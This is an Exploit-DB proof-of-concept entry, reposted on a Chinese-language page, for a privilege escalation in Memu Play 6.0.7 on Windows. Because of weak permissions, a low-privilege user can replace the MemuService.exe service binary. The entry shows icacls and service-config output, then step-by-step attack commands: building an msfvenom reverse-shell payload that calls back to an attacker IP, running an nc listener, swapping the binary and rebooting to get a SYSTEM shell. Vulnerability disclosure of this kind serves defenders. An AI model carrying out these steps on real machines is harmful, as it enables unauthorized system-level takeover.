Memu Play 6.0.7 – Privilege Escalation

• Exploit Database
• 15 阅读

• 作者： Alejandra Sánchez
  日期： 2019-02-21
• 类别：

  • local
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/46437/

• # Exploit Title: Memu Play 6.0.7 - Privilege Escalation (PoC)
  # Date: 20/02/2019
  # Author: Alejandra Sánchez
  # Vendor Homepage: https://www.memuplay.com/
  # Software Link: https://www.memuplay.com/download-en.php?file_name=Memu-Setup&from=official_release
  # Version: 6.0.7
  # Tested on: Windows 10 / Windows 7
  
  
  # Description:
  #Memu Play 6.0.7 suffers from Privilege Escalation due to insecure file permissions
  
  # Prerequisites
  # Local, Low privilege access with restart capabilities
  
  # Details
  # By default the Authenticated Users group has the modify permission to ESM folders/files as shown below.
  # A low privilege account is able to rename the MemuService.exe file located in this same path and replace 
  # with a malicious file that would connect back to an attacking computer giving system level privileges 
  # (nt authority\system) due to the service running as Local System.
  # While a low privilege user is unable to restart the service through the application, a restart of the 
  # computer triggers the execution of the malicious file.
  
  
  C:\>icacls "C:\Program Files (x86)\Microvirt\MEmu\MemuService.exe"
  C:\Program Files (x86)\Microvirt\MEmu\MemuService.exe Everyone:(I)(F)
  BUILTIN\Administrators:(I)(F)
  BUILTIN\Users:(I)(F)
  NT AUTHORITY\SYSTEM:(I)(F)
  
  
  Successfully processed 1 files; Failed processing 0 files
  
  
  C:\>sc qc MEmuSVC
  [SC] QueryServiceConfig SUCCESS
  
  SERVICE_NAME: MEmuSVC
  TYPE : 10WIN32_OWN_PROCESS
  START_TYPE : 2 AUTO_START
  ERROR_CONTROL: 1 NORMAL
  BINARY_PATH_NAME : C:\Program Files (x86)\Microvirt\MEmu\MemuService.exe
  LOAD_ORDER_GROUP :
  TAG: 0
  
  
  # Proof of Concept
  
  1. Generate malicious .exe on attacking machine
  msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.130 LPORT=443 -f exe > /var/www/html/MemuService.exe
  
  2. Setup listener and ensure apache is running on attacking machine
  nc -lvp 443
  service apache2 start
  
  3. Download malicious .exe on victim machine
  Open browser to http://192.168.1.130/MemuService.exe and download
  
  4. Overwrite file and copy malicious .exe.
  Renename C:\Program Files (x86)\Microvirt\MEmu\MemuService.exe > MemuService.bak
  Copy/Move downloaded 'MemuService.exe' file to C:\Program Files (x86)\Microvirt\MEmu\
  
  5. Restart victim machine
  
  6. Reverse Shell on attacking machine opens
  C:\Windows\system32>whoami
  whoami
  nt authority\system